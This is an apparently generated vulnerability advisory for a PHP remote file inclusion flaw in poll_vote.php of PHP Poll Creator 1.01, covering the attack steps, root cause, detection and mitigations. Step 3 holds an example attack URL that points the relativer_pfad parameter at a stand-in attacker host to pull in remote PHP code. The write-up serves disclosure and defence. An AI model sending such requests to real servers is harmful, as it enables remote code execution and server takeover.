Source: cve@mitre.org
PHP remote file inclusion vulnerability in poll_vote.php in PHP Poll Creator 1.01 allows remote attackers to execute arbitrary PHP code via the relativer_pfad parameter.
PHP Poll Creator 1.01 is vulnerable to a remote file inclusion (RFI) attack, allowing attackers to execute arbitrary PHP code on the server. This vulnerability, exploited via the relativer_pfad parameter, can lead to complete system compromise and data breaches, potentially impacting confidentiality, integrity, and availability.
Step 1: Vulnerability Identification: The attacker identifies a web server running PHP Poll Creator 1.01 and identifies the poll_vote.php script.
Step 2: Payload Preparation: The attacker crafts a malicious PHP script, either hosted on a remote server or placed on the target server (if possible through other vulnerabilities or misconfigurations).
Step 3: Payload Delivery: The attacker sends a crafted HTTP request to poll_vote.php containing the relativer_pfad parameter, pointing to the location of the malicious PHP script (e.g., poll_vote.php?relativer_pfad=http://attacker.com/malicious.txt).
Step 4: Code Execution: The poll_vote.php script, due to the lack of input validation, includes the attacker's malicious PHP script. The server's PHP interpreter then executes the injected code.
Step 5: System Compromise: The attacker's code executes, potentially allowing them to gain a shell, upload webshells, steal sensitive data, or otherwise compromise the server.
The vulnerability stems from a lack of input validation and sanitization in the poll_vote.php script. The script uses the relativer_pfad parameter to include files without properly verifying the source or content. This allows an attacker to inject malicious PHP code by pointing relativer_pfad to a remote or local file containing the attacker's code. The included file is then executed by the PHP interpreter, granting the attacker control over the server's resources. The root cause is the insecure use of the include or require functions with user-controlled input, leading to code execution.
This vulnerability is a classic example of a web application security flaw. While no specific APTs are directly tied to this CVE, it is the type of vulnerability that could be exploited by any attacker, including those involved in ransomware campaigns or data theft. This vulnerability is not listed on the CISA KEV as of the current date, but the underlying RFI issue is a common attack vector.
Monitor web server access logs for suspicious requests to poll_vote.php with the relativer_pfad parameter, especially those containing URLs or unusual file paths.
Analyze HTTP requests for unusual User-Agent strings or other indicators of malicious activity.
Implement file integrity monitoring to detect changes to PHP files, especially those related to the poll application.
Network Intrusion Detection Systems (IDS) can be configured to detect RFI attempts by looking for patterns in HTTP requests, such as the use of include or require with user-supplied input.
Examine PHP error logs for unexpected file inclusion errors or warnings.
Upgrade to a patched version of PHP Poll Creator (if available). Since this is an old version, this may not be possible. Consider removing the application if it is no longer needed.
Implement input validation and sanitization on all user-supplied input, especially the relativer_pfad parameter. Ensure that the input is a valid local file path and does not contain any malicious characters or URLs.
Disable the use of remote file inclusion in the PHP configuration (allow_url_include = Off).
Use a web application firewall (WAF) to filter malicious requests and block RFI attempts.
Regularly scan the web server for vulnerabilities and apply security patches promptly.
Implement the principle of least privilege, ensuring that the web server user has only the necessary permissions to access files and directories.